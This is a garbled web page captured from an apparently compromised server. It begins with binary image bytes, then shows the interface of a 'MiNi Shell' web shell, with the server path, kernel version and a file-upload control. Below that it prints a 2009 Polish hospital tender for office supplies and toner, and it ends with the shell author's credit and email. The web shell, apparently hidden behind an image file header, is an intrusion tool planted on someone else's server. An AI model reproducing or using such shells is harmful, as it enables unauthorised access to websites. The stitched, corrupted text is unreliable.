JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090918/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090918/159129-N-2009.html

<p class="kh_header"><b>Włocławek: DIZ- 50- 2009 Dostawa materiałów biurowych</b><br>
<b>Numer ogłoszenia: 159129 - 2009; data zamieszczenia: 18.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Wojewódzki , ul. Wieniecka 49, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 054 412-94-32, faks 054 4129432.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.republika.szpitalwloclawek.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.szpital.wloclawek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DIZ- 50- 2009 Dostawa materiałów biurowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1. Materiały papiernicze:

l.p.	asortyment	j.m.	Ilość rocznie
1	blok makulaturowy A 4 w kratkę 100 kartkowy, klejony grzbiet na krótszym boku	szt	240
2	kalendarz książkowy A4	szt	15
3	kalka maszynowa A 4  po 100 arkuszy	szt	30
4	kalka ołówkowa A4 po 100 arkuszy 	szt.	20
5	karteczki samoprzylepne  40mm x 50mm, bloczek 100 kartkowy żółte	bl	25
6	karteczki samoprzylepne  76mm x 76mm, bloczek 100 kartkowy żółte	bl	480
7	karteczki samoprzylepne żółte 76mm x 76mm, bloczek 400 kartkowy	bl	120
8	karteczki  białe 85mm x 85mm, bloczek 400 kartkowy	bl	15
9	karteczki - znaczniki  kolorowe 20 x 50 mm, 4 x 50 sztuk w jednym bloczku 	bl	300
10	folia do faksu facsimile ink film fullmark KX-FHD 332-343 Reorder N0 TTRP 93, op. po 2 rolki	op.	8
11	Koperta  brązowa do akt osobowych, format C4 229 x 324 mm, bez okna, samoklejąca, klejona po krótszym boku, op. po 250 szt.	op.	20
12	koperta biała, format C5  162 x 229 mm, bez okna, samoklejąca, klejona po krótszym boku, op. po 500 szt	op.	8
13	koperta biała, format C6 114 x 162 mm bez okna, samoklejąca, klejona po dłuższym  boku, op. po 1000 szt	
op.	20
14	koperta  brązowa, format  E4 280 x 400 mm z rozszerzanymi bokami i spodem, samoklejąca z paskiem, op. po 250 szt	
op.	4
15	koperta ochronna format C-13  z warstwą z folii bąbelkowej wewnątrz, o wymiarach zewnętrznych 170 x 220 mm , bez okna, samoklejąca z paskiem,  klejona po krótszym boku, 	

szt	300
16	koperta ochronna format D-14  z warstwą z folii bąbelkowej wewnątrz, o wymiarach zewnętrznych 200 x 270 mm, bez okna, samoklejąca z paskiem,  klejona po krótszym boku	szt	200
17	koperta ochronna format F-16  z warstwą z folii bąbelkowej wewnątrz, o wymiarach zewnętrznych 240 x 350 mm , bez okna, samoklejąca z paskiem,  klejona po krótszym boku	szt	100
18	papier do drukarki składanka  1 warstwowa w rozmiarze  240-12, papier bezpyłowy, bezchlorkowy, nietoksyczny i nieszkodliwy dla zdrowia	op	25
19	papier do drukarki termiczny 110 mm - 30 m	szt.	100
20	papier do drukarki termiczny 57 mm - 30 m	szt.	200
21	papier do faxu - 210 mm x 30 mb	rolki	200
22	papier do faxu 216 mm x 30 mb	rolki	6
23	papier do faxu termotransferowy TTR 220 mm x 100 mb, model faxu Panasonic KX-KF 1015 - folia	rolki	4
24	papier do pisania w kratkę, format A4, gramatura 65 g-m2 , op. po 500 sztuk	ryza	8
25	papier uniwersalny biały do drukarek i kserokopiarek, format  A3, klasa B, gramatura 80g m2 , skala białości  min. 160 CIE, ryza 500 arkuszy	ryza	100
26	papier uniwersalny biały do drukarek i kserokopiarek, format  A4, klasa B, gramatura 80g-m2 , skala białości  min. 160 CIE, ryza 500 arkuszy	ryza	2 000
27	papier uniwersalny kolorowy do drukarek i kserokopiarek, format  A4,  gramatura 80g-m2 , ryza 500 arkuszy	ryza	200
28	papier maszynowy, format A4, ryza 500 arkuszy	ryza	5
29	papier przebitkowy A4 ryza po 500 szt.	ryza	10
30	zeszyt   w kratkę 32 kartkowy, format A 5, miękka oprawa	szt.	20
31	zeszyt szyty, w kratkę 96 kartkowy, format  A 4, oprawa twarda	szt.	500
32	zeszyt szyty w kratkę, 96 kartek, format A5,  oprawa twarda 	szt.	300




Zadanie 2. materiały piśmienne i pozostałe biurowe:


l.p.	asortyment	j.m.	Ilość rocznie
1	cienkopis kulkowy typu PILOT  Hi-Tecpoint V5 różne kolory (czarny, czerwony,  niebieski, fioletowy )	szt	100
2	cienkopis typu STABILO,  różne kolory z odpornym na wysychanie tuszem	szt	100
3	datownik	szt	5
4	długopis typy PENTEL BK 101 z gumowym uchwytem i wymiennym wkładem różne kolory	szt.	900
5	długopis typu ZENITH z wymiennym wkładem, niebieski, czarny	szt.	150
6	długopis żelowy typu PENTEL KN706 z wymiennym wkładem  różne kolory	szt.	100
7	dziennik korespondencyjny  A4 , 96 kartek, szyty w sztywnej oprawie	szt.	10
8	dziurkacz ze wskaźnikiem środka strony, z ogranicznikiem do formatu papieru , ilość dziurkowanych kartek  około 20 sztuk	szt.	10
9	film termotransferowy do faxu  TTR 220mm x 100 m, model faxu Panasonic KX-F1015	szt	8
10	flamaster wodoodporny cienki czarny	szt	60
11	flamaster wodoodporny gruby czarny	szt	60
12	grzbiety plastikowe do bindowania typu MINTRA, format A 4 -  8 mm, op. po 100 sztuk	op.	5
13	grzbiety plastikowe do bindowania typu MINTRA, format A 4 - 10 mm, op. po 100 sztuk	op.	5
14	grzbiety plastikowe do bindowania typu MINTRA, format A 4 - 12 mm, op. po 100 sztuk	op.	5
15	grzbiety plastikowe do bindowania typu MINTRA, format A 4 - 14mm, op. po 100 sztuk	op.	2
16	grzbiety plastikowe do bindowania typu MINTRA, format A 4 - 16 mm, op. po 100 sztuk	op.	2
17	grzbiety plastikowe do bindowania typu MINTRA, format A 4 - 22 mm, op. po 50 sztuk	op.	2
18	grzbiety plastikowe do bindowania typu MINTRA, format A 4 - 25 mm, op. po 50 sztuk	op.	2
19	gumka ołówkowa do ścierania  uniwersalna   typu PENTEL	szt	25
20	Kalkulator typu CITIZEN SDC - 368	szt.	30
21	klej biurowy w sztyfcie typu PENTEL 20 g uniwersalny do papieru, kartonów, fotografii, bezbarwny, bezzapachowy	szt.	200
22	klej biurowy w płynie typu PENTEL 50 ml z dozownikiem w gąbce uniwersalny do papieru, kartonów, fotografii, bezbarwny, bezzapachowy	szt.	15
23	korektor w płynie z pędzelkiem, szybkoschnący, o pojemności  20 ml, nietoksyczny, bezzapachowy, na bazie wody	
szt	50
24	korektor w taśmie typu PENTEL, w przezroczystej obudowie, długość taśmy 8,5 m, szerokość 4,2 mm	
szt	15
25	korektor z metalową cienkopisząca końcówką o pojemności 7 ml, szybkoschnący, nietoksyczny, bezza-pachowy	
szt	250
26	koszulka na dokumenty format  A 4, boczna perforacja z możliwością wpinania do segregatora, wykona-na z PCV o bardzo wysokiej przezroczystości po 100 szt. w opakowaniu krystaliczne	op	1 000
27	koszulka na dokumenty format  A 5, boczna perforacja z możliwością wpinania do segregatora, wykona-na z PCV  po 100 szt. w op.	op	1 000
28	linijka biurowa o  długości 20 cm wykonana z przezroczystego plastiku 		10
29	linijka biurowa o  długości 30 cm wykonana z przezroczystego plastiku 		20
30	magnesy do białych tablic	szt.	90
31	markery kolorowe wodoodporne do białych tablic, suchościeralne 	szt.	500
32	nóż do otwierania kartonów, korespondencji, ostrze wykonane z metalu	szt.	5
33	nożyczki biurowe 21 cm z satynowym ostrzem ze stali nierdzewnej, wyprofilowana rękojeść 		30
34	ofertówka  na dokumenty format A4, przezroczysta, wykonana  z twardej folii PCV, zgrzana w literę L, op. po 25 szt	op.	240
35	ofertówka  na dokumenty format A5, przezroczysta, wykonana  z twardej folii PCV, zgrzana w literę L, op. po 25 szt.	op.	8
36	okładka do bindowania przezroczysta, format A 4 , wykonana z folii PCV o grubości 0,2 mm, opakowanie po 100 sztuk	op.	20
37	okładka do bindowania kolorowa, format A 4 , wykonana z kartonu o gramaturze 250g/m2, opakowanie po 100 sztuk, imitacja skóry.	op.	20
38	ołówek drewniany bez gumki, twardość HB 	szt.	60
39	ołówek automat typu PENTEL z mechanizmem oszczędzania grafitu, z wymiennym grafitem	szt.	10
40	ołówek drewniany  z gumką, twardość HB	szt.	40
41	pisaki różne kolory	szt.	100
42	pinezki metalowe op. 100 sztuk	op.	200
43	płyty CD -R w plastikowym opakowaniu	szt.	1000
44	płyty DVD - R w plastikowym opakowaniu	szt.	100
45	poduszka do stempli o wymiarach 5,5 x 8 cm	szt.	30
46	rolka offsetowa 55g/m2 o wymiarach 57mm x 30 m, pakowana w folię termokurczliwą po 10 szt.	op.	40
47	segregator A4, z metalowym mechanizmem zaciskowym, wykonany z kartonu pokrytego na zewnątrz folią PCV, dolna krawędź wzmocniona szyną , wymienna etykieta, różne kolory	szt.	2000
48	segregator A5, z metalowym mechanizmem zaciskowym, wykonany z kartonu pokrytego na zewnątrz folią PCV, dolna krawędź , wymienna etykieta, różne kolory	szt.	1000
49	skoroszyt A4 sztywny zawieszany do segregatora, wykonany z PCV , przednia okładka  przezroczysta, tylna kolorowa, wyposażony w papierowy wysuwany pasek (wąs)  do opisu	szt.	6000
50	skorowidz adresowy alfabetyczny A4, okładka sztywna, laminowana indeks alfabetyczny, 80 kartek	szt.	30
51	skorowidz A5 adresowy alfabetyczny A4, okładka sztywna, laminowana indeks alfabetyczny, 80 kartek	szt.	10
52	spinacz biurowy okrągły 50 mm , op. 100 sztuk 	op.	20
53	spinacz biurowy okrągły 33 mm , op. 100 sztuk 	op.	800
54	spinacz biurowy okrągły 28 mm , op. 100 sztuk 	op.	400
55	sznurek pakowy jutowy w szpuli po 0,5 kg	szt.	20
56	taśma biurowa o wymiarach 19 mm x 33 m wykonana z przezroczystej folii, wysoka przylepność i przej-rzystość 	szt.	200
57	taśma biurowa o wymiarach 24 mm x 30 m wykonana z przezroczystej folii, wysoka przylepność i przej-rzystość	szt.	50
58	taśma barwiąca do maszyny do pisania 13 mm x 10 m 	szt.	15
59	taśma barwiąca do maszyny elektrycznej typu OLIMPIA Carrera de lux	szt.	4
60	taśma dwustronnie klejąca do klejenia folii, papieru 38mm x 10 m 	szt.	50
61	taśma pakowa szara 48 mm x 50 m 	szt.	8
62	teczka do akt osobowych z instrukcją, format A4, sztywny grzbiet, oklejana , wyposażona w trzy prze-gródki A, B, C , różne kolory w formie segregatora.	szt.	500
63	teczka kartonowa biała, format A 4 , wiązana 	szt.	100
64	teczka  kartonowa, lakierowana  trzyskrzydłowa z gumka, format A 4	szt.	600
65	teczka plastykowa wiązana, format A 4,  różne kolory	szt.	300
66	temperówka metalowa,  kostka	szt.	10
67	tusz olejowy do nasączania poduszek do stempli, czarny, niebieski	szt.	70
68	wkład żelowy do długopisu, różne kolory czarny	szt.	600
69	wkład do długopisów zwykły, z grubą końcówką,  różne kolory czarne	szt.	150
70	wkład do długopisów typu PENTEL różne kolory BK - 77	szt.	120
71	wkład do długopisu  typu ZENIT	szt.	170
72	wkład do długopisu typu PENTEL BK 101	szt.	100
73	wkład do kalkulatora CITIZEN CX - 123 II - wałek barwiący	szt.	10
74	wkład żelowy do długopisu typu PENTEL KN706	szt.	50
75	wkłady do ołówka typu PENTEL 0,7mm 	szt.	5
76	zakreślacz do tekstów, fluorescencyjny , do wszystkich rodzajów papierów, końcówka ścięta o grubości 5 mm , różne kolory	szt.	150
77	zszywacz biurowy na zszywki 24-6 z możliwością zszywania jednorazowo do 20 kartek, góra wykonana z tworzywa sztucznego, dół i część mechaniczna z metalu	
szt.	50
78	zszywki metalowe obustronnie ostrzone  małe 10, op. po  1000 szt.	op.	200
79	zszywki metalowe obustronnie ostrzone  średnie 24-6, op. po 1000 szt	op.	1000
80	zszywki metalowe obustronnie ostrzone  duże 23-15, op. po 1000 szt.	op.	100
81	zwilżacz do palców na bazie gliceryny, bezbarwny, bezwonny, zawartość 20 ml	szt.	6








Zadanie 3.  Materiały eksploatacyjne do drukarek:

l.p.	asortyment	j.m.	Ilość rocznie
1	toner 113R296 ( poj. 5 tys. stron )	szt.	10
2	toner  C7115A ( poj. 2,5 tys. stron)	szt.	45
3	toner C3906A ( poj. 2,5 tys. stron)	szt.	20
4	toner Q2612A (poj. 2 tys. stron)	szt.	30
5	toner 106R00676 (poj. 2 tys. stron)	szt.	4
6	toner 106R00677 (poj. 2 tys. stron)	szt.	4
7	toner 106R00678 (poj. 2 tys. stron)	szt.	4
8	toner 106R00679 (poj. 3 tys. stron)	szt.	8
9	toner TN 6300 (poj. 3 tys. stron)	szt.	10
10	toner Q5949A (poj. 2,5 tys. stron)	szt.	80
11	toner Q4092A (poj. 2,5 tys. stron)	szt.	30
13	toner Q2624A (poj. 2,5 tys. stron)	szt.	50
15	toner ML-1610D2 (poj. 3  tys. stron)	szt.	10
16	toner TK-18 (poj. 7,5 tys. stron) 	szt.	10
17	toner OKIPAGE 14ex Typ 8 (poj. 4 tys. stron)	szt.	10
18	toner 106R01159 (poj. 3 tys. stron)	szt.	10
19	tusz C6657A (poj. 17 ml)	szt.	20
20	tusz C6656A (poj. 19 ml)	szt.	40
21	tusz C8728A (poj. 8 ml)	szt.	50
22	tusz C8727A (poj. 10 ml) 	szt.	85
23	tusz C6625A (poj. 15 ml)	szt.	15
24	tusz C6615D (poj. 25 ml)	szt.	40
25	tusz C1823D (poj. 30 ml)	szt.	10
26	tusz 51645A (poj. 42 ml)	szt.	20
27	tusz C8766EE (poj. 7 ml)	szt.	20
28	tusz C8765EE (poj. 11 ml)	szt.	20
29	tusz 51649A (poj. 22,5 ml)	szt.	20
30	tusz C6614D (poj. 28 ml)	szt.	20
31	tusz C6578D (poj. 19 ml)	szt.	15
32	tusz 13619HC (poj. 300)	szt.	5
33	tusz 13400HC (poj. 600)	szt.	10
34	tusz C9351A (poj. 5 ml)	szt.	20
35	tusz C8767EE (poj. 21 ml)	szt.	10
36	tusz 51629A (poj. 40 ml)	szt.	20
37	tusz C9700A (poj. 5 tys.)	szt.	8
38	tusz C9701A (poj. 4 tys.)	szt.	4
39	tusz C9702A (poj. 4 tys.)	szt.	4
40	tusz C9703A (poj. 4 tys.)	szt.	4
41	toner Q7553A (poj. 3,0 tys.)	szt.	15
42	tusz C9351AEBA5 (poj. 5 ml)	szt.	10
43	tusz C9351AE (poj. 5 ml)	szt.	10
44	tusz C9352AE (poj. 5 ml)	szt.	5
45	tusz TO711	szt.	10
46	tusz TO712	szt.	4
47	tusz TO713	szt.	4.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy :
1. prowadzą działalność gospodarczą  w zakresie sprzedaży hurtowej lub detalicznej materia-łów biurowych 
- za spełnienie tego warunku Zamawiający uzna  przedstawienie dokumentu  
  potwierdzającego, że  Wykonawca prowadzi  ww. działalność.

2 . posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i 
    osobami zdolnymi do wykonania zamówienia:
- za spełnienie warunku posiadania niezbędnego doświadczenia w branży dosta-wy materiałów biurowych  Zamawiający uzna wykonanie z należytą starannością w okresie ostatnich 3 lat , a jeśli okres prowadzenia  działalności jest krótszy - w tym okresie),przed dniem wszczęcia postępowania - co najmniej 3 dostaw o cha-rakterze i złożoności porównywalnej z przedmiotem zamówienia  (co najmniej 3 dostawy wykonane za kwotę minimum 150 000,00 zł każda)

4. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego na  pod-stawie art.  24 ust. 1 i 2 ustawy pzp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Celem potwierdzenia spełnienia warunków z art. 22, Wykonawca zobowiązany jest złożyć w swojej ofercie;
a aktualny odpis z właściwego rejestru, albo zaświadczenie o wpisie do ewidencji działalno-ści gospodarczej, wystawiony nie wcześniej niż  6 miesięcy przed upływem terminu składa-nia ofert;
2. wypełniony i podpisany  Druk ofertowy, zgodnie z Załącznikiem  nr 1 do niniejszej  
   specyfikacji;
3. wypełniony i podpisany  Formularz asortymentowo-cenowy, zgodnie z Załącznikiem  nr 1a, 1b, 1c do niniejszej specyfikacji;
4. oświadczenie o spełnieniu warunków udziału w postępowaniu, zgodnie z Załącznikiem nr 2 do niniejszej specyfikacji;
5. oświadczenie o zapoznaniu się z niektórymi przepisami, zgodnie z Załącznikiem nr 3 do 
    niniejszej  specyfikacji;
6. oświadczenie o zapoznaniu się ze Specyfikacją Istotnych Warunków Zamówienia, zgodnie z Załącznikiem nr 4 ;
7. zaakceptowany i podpisany projekt umowy stanowiący Załącznik nr 5 do niniejszej  
    specyfikacji;
8. wykaz wykonanych dostaw materiałów biurowych, wraz z załączeniem dokumentów   po-twierdzających, że wskazane dostawy zostały wykonane z należytą starannością (co najmniej 3 dostawy wykonane za kwotę minimum 150 000,00 zł każda), zgodnie z Załącznikiem nr 6  do niniejszej   specyfikacji;
9. pełnomocnictwo do reprezentowania Wykonawcy (o ile nie wynika z dokumentów 
    rejestracyjnych)  w przypadku podpisywania oferty przez osobę nie wpisaną do dokumentów rejestracyjnych;.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital.wloclawek.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Wojewódzki, ul. Wieniecka 49,  87-800 Włocławek, pokój 303 (budynek 
  administracji, pokój 303).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.10.2009 godzina 10:00, miejsce: Szpital Wojewódzki, ul. Wieniecka 49,  87-800 Włocławek, pokój 303 (budynek 
  administracji, pokój 303).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com